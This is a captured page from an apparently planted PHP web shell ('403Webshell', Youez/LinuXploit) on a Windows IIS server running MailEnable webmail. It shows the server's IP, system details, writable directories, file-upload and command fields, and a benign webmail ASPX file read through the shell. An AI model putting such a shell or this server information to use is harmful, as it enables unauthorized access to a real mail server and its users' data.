403Webshell
Server IP : 209.209.40.120  /  Your IP : 216.73.217.112
Web Server : Microsoft-IIS/10.0
System : Windows NT NEWWWW 10.0 build 17763 (Windows Server 2019) i586
User : NEWWWW$ ( 0)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files (x86)/Mail Enable/Bin/NETWebMail/Mobile/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files (x86)/Mail Enable/Bin/NETWebMail/Mobile//Attachments.aspx
<%@ Page Language="vb" AutoEventWireup="false" CodeBehind="Attachments.aspx.vb" Inherits="MailEnable.Clients.WebMail.Mobile.Attachments" %>
<%@ Register TagPrefix="m" TagName="Document" Src="Controls/Document.ascx" %>
<%@ Register TagPrefix="m" TagName="Page" Src="Controls/Page.ascx" %>

<m:Document Title="Login" runat="server">
    <Content>
        <m:Page Title="Attachments" runat="server">
            <Content>
                <asp:ListView id="AttachmentsListView" runat="server">
                    <LayoutTemplate>
                        <ul data-role="listview">
                            <asp:PlaceHolder id="itemPlaceholder" runat="server" />
                        </ul>
                    </LayoutTemplate>
                    <ItemTemplate>
                        <li>
                            <a data-ajax="false" target="_blank" href="GetAttachment.aspx?Message=<%=MessageId%>&Folder=<%=Server.UrlEncode(RelativeFolderPath)%>&Attachment=<%#(DataBinder.Eval(Container.DataItem, "ContentDepositionFileName"))%>&Seq=<%#(DataBinder.Eval(Container.DataItem, "ContentCount"))%>">
                                <h3><%#MailEnable.Clients.WebMail.Mobile.MessageList.WebPrep_Subject(DataBinder.Eval(Container.DataItem, "ContentDepositionFileName"))%></h3>
                                <p class="ui-li-aside"><%#MailEnable.Clients.WebMail.Mobile.MessageList.WebPrep_Size(DataBinder.Eval(Container.DataItem, "ContentSize"))%></p>
                                <p><%#DataBinder.Eval(Container.DataItem, "ContentType")%></p>
                            </a>
                        </li>
                    </ItemTemplate>
                    <EmptyDataTemplate>
                        <% If LicensedForAttachments Then%>
                            <p>This message has no attachments.</p>
                        <% Else%>
                            <p>The license for this software prevents access to attachments.</p>
                        <% End If%>
                    </EmptyDataTemplate>
                </asp:ListView>
            </Content>
        </m:Page>
    </Content>
</m:Document>

Youez - 2016 - github.com/yon3zu
LinuXploit